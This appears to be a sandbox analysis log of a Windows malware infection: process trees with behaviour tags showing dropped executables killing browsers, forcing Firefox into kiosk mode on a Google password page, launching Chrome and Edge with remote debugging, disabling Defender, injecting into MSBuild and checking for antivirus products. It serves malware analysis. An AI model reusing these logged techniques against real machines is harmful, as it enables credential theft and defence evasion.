C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2168,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:25⤵PID:3720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2496,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=2756 /prefetch:85⤵PID:1188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3544,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:15⤵
- Uses browser remote debugging
PID:2952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3552,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=3376 /prefetch:15⤵
- Uses browser remote debugging
PID:4064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4216,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:15⤵
- Uses browser remote debugging
PID:5672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4236,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:25⤵
- Uses browser remote debugging
PID:5540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3636,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=3736 /prefetch:85⤵PID:6360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3732,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=5320 /prefetch:85⤵PID:6676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5260,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:85⤵PID:2652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5272,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:85⤵PID:4216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6524,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6548 /prefetch:85⤵PID:6924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6524,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6548 /prefetch:85⤵PID:6940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6644,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6696 /prefetch:85⤵PID:2868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6848,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:85⤵PID:1504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7112,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6872 /prefetch:85⤵PID:5524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6952,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:85⤵PID:5348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7116,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7136 /prefetch:85⤵PID:6160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7292,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7304 /prefetch:85⤵PID:6180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7452,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7464 /prefetch:85⤵PID:6360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7480,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7468 /prefetch:85⤵PID:4388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361730101\d0fba8cbde.exe"C:\Users\Admin\AppData\Local\Temp\10361730101\d0fba8cbde.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2720 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:5356
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1392 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {dfa8ddf3-6388-4fb5-8305-fc975c0ffd80} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:448
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2476 -prefsLen 27135 -prefMapHandle 2480 -prefMapSize 270279 -ipcHandle 2488 -initialChannelId {fe2ed4d4-2274-4426-be52-aad97504815b} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵PID:4060
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3812 -prefsLen 25164 -prefMapHandle 3816 -prefMapSize 270279 -jsInitHandle 3820 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3828 -initialChannelId {0c680f5b-462d-401c-a062-4be186006a1c} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
- Checks processor information in registry
PID:4500
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3980 -prefsLen 27276 -prefMapHandle 3984 -prefMapSize 270279 -ipcHandle 4052 -initialChannelId {02409321-e47c-4e86-b0ce-1614a899a699} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵PID:5868
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4556 -prefsLen 34775 -prefMapHandle 4560 -prefMapSize 270279 -jsInitHandle 4564 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4572 -initialChannelId {7488d36a-ed6e-4901-bb8f-86953182afd8} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵
- Checks processor information in registry
PID:2804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5140 -prefsLen 35012 -prefMapHandle 5144 -prefMapSize 270279 -ipcHandle 5152 -initialChannelId {bfac9f38-4f9e-4e9e-b1bd-f22b059223fb} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵
- Checks processor information in registry
PID:6204
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5440 -prefsLen 32952 -prefMapHandle 5444 -prefMapSize 270279 -jsInitHandle 5448 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2668 -initialChannelId {03575e37-1941-4bfb-bcad-714bc7406ff1} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵
- Checks processor information in registry
PID:6464
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5460 -prefsLen 32952 -prefMapHandle 5632 -prefMapSize 270279 -jsInitHandle 5636 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5644 -initialChannelId {6b700fb6-a5c9-4db2-87e2-c59d9c8c4b00} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵
- Checks processor information in registry
PID:6476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5816 -prefsLen 32952 -prefMapHandle 5820 -prefMapSize 270279 -jsInitHandle 5824 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5832 -initialChannelId {b2ec3d06-7d44-4ae5-9081-372ae0a60dcf} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵
- Checks processor information in registry
PID:6504
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 18124 -prefsLen 36905 -prefMapHandle 10520 -prefMapSize 270279 -jsInitHandle 4908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3996 -initialChannelId {569a1635-aba0-4888-b5d3-e7f92f0ce90e} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab6⤵
- Checks processor information in registry
PID:10424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 19624 -prefsLen 36955 -prefMapHandle 19684 -prefMapSize 270279 -jsInitHandle 19524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3924 -initialChannelId {1dee40ed-4cc0-4363-9705-0ca6bc302ddb} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab6⤵
- Checks processor information in registry
PID:14520
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361740101\ab7380df2b.exe"C:\Users\Admin\AppData\Local\Temp\10361740101\ab7380df2b.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\Users\Admin\AppData\Local\Temp\10361750101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10361750101\jokererer.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3416 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7164
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361760101\UYpk7xI.exe"C:\Users\Admin\AppData\Local\Temp\10361760101\UYpk7xI.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5416 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2716 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:3124 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffbfcfdcf8,0x7fffbfcfdd04,0x7fffbfcfdd106⤵PID:2884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1780,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=2408 /prefetch:36⤵PID:5812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2116,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=2476 /prefetch:86⤵PID:6880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2396,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=2392 /prefetch:26⤵PID:6424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2804,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=3124 /prefetch:16⤵
- Uses browser remote debugging
PID:6368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2812,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:16⤵
- Uses browser remote debugging
PID:5432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4012,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:26⤵
- Uses browser remote debugging
PID:6484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4536,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=4620 /prefetch:16⤵
- Uses browser remote debugging
PID:3920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4984,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:86⤵PID:7036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5508,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:86⤵PID:384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5596,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5064 /prefetch:86⤵PID:2088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5752,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5764 /prefetch:86⤵PID:4484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5888,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5900 /prefetch:86⤵PID:6944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6048,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:86⤵PID:456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4440,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5528 /prefetch:86⤵PID:13088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3176,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=6280 /prefetch:86⤵PID:13096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6064,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:86⤵PID:13104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=6384,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:86⤵PID:5580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4744,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:86⤵PID:24888
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361770101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10361770101\7IIl2eE.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6444 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
- System Location Discovery: System Language Discovery
PID:5524 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:6416
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
PID:6656
-
-
